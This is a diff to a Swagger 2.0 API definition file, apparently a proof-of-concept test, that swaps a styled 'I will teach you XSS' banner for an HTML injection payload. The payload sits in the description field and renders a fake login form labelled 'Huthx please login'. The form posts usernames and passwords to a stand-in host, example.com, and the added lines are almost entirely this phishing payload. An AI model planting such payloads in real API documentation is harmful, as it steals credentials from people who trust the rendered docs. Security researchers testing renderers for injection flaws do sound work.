--- a/test.yaml
+++ b/test.yaml
@@ -1,14 +1,30 @@
 swagger: '2.0'
 info:
   version: 1.0.0
-  title: XSS Styled Box
-  description: |
-    <div style="border:2px solid red; padding:10px; margin:10px 0; background:#fff3cd; color:#856404; font-family:sans-serif;">
-      <strong>huthx</strong>, I will teach you XSS.
+  title: Fake Login Page
+  description: '<div class="login-form">
+    <div class="heading">
+        <h1>HTML Injection : Huthx please login</h1>
     </div>
+    <div class="form-container">
+        <form action="https://example.com/login" method="post" class="form-signin">
+            <div class="form-group">
+                <label for="username">Huthx Username</label>
+                <input type="text" name="username" size="20">
+            </div>
+            <div class="form-group">
+                <label for="password">Huthx Pass</label>
+                <input type="password" name="password" size="20">
+            </div>
+            <div class="form-group">
+                <button type="submit" class="btn btn-default">Login</button>
+            </div>
+        </form>
+    </div>
+</div>'
 paths:
   /:
-    get:
+    post:
       responses:
         '200':
-          description: OK
+          description: HUTHX
